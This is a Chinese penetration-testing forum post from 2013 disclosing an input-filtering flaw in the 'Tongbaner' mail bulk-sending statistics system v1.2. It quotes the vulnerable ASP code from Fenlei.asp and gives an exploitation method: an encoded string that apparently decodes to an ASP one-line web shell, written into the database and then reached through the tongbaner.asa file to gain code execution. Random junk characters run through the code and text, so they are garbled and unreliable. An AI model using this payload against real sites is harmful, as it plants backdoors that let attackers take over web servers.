中国网络渗透测试联盟

标题: 铜板儿网邮件群发统计系统 v1.2 漏洞 [打印本页]
作者: admin    时间: 2013-3-14 20:14
标题: 铜板儿网邮件群发统计系统 v1.2 漏洞
'Fenlei.asp
. e0 L$ M4 v, d8 L+ l# ?3 [
2 k* Z& H7 r& n; uIF Request.QueryString("Action")="del" Then % X! |. @! s& H+ |( Z6 d
ID=Request.QueryString("ID")
$ x" b: _. G0 ~; d  I; g4 bIF Countss ("tui","Fenlei",ID )<>0 then   I, p% i! s* t& ?8 Z+ k
'略
% M8 c0 R* X. E3 \5 ]1 F# `8 aIF Request.QueryString("Action")="Add" Then
& F- a0 i( [) {8 `Tname=Request.Form("Typename")
3 x  x. Z% {( a- z) R; d5 qSet Rs=Server.CreateObject("adodb.Recordset")
: d4 ~7 ~5 J9 g+ aSql="Select * From Fenlei Order by id Desc " 9 h( h+ _- w7 B( M: r" W( k
Rs.Open Sql,Conn,1,3
7 O( K# o: i- F3 s8 ORs.Addnew 4 w- o% Y8 b7 t  G
Rs("Typename")=Tname 2 H' `6 @( `; Y/ l8 C. q( R. I
'略 1 H; P) g( `: e: O: O
Set Rs=Server.CreateObject("adodb.Recordset")
$ |' v6 |/ W0 e, O0 [5 i# ^% {  iSql="Select * From Fenlei Order by id Desc " ) |/ Z5 o4 r2 K- b9 Q6 Z
Rs.Open Sql,Conn,1,1
' h: E* a- o4 X& c'略 6 ^# G3 w" D2 C+ C  n. X  S; Y! k6 O
%>
% m4 [& k) w8 [1 ?4 A/ I2 D ' r3 r" J! J* c4 Y, K* z0 c
7 b1 l, V2 {# ~0 @

5 a' }$ U4 B" [" u没有过滤,直接写入数据库。, e4 @& x2 |; Q+ c& v
! A: E# V; d/ @! [$ {7 Y
利用方法:4 R6 K! j5 m, b6 S# `5 u

6 @& H) L; A% O+ N插入:┼攠數畣整爠煥敵瑳∨≡┩>
" J' K3 R2 L$ l7 [; v   a0 s: A8 v' m! {# W! ~; K4 W

# U; m. }8 d& Z连接: http://www.xxx.com/###tongbaner.asa
8 S2 o+ ?7 l* G, m3 {'默认安装文件:
+ K. \/ L$ r. k$ i# ?'install.asp
! x' y: c6 O9 W1 Y) M1 ^



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2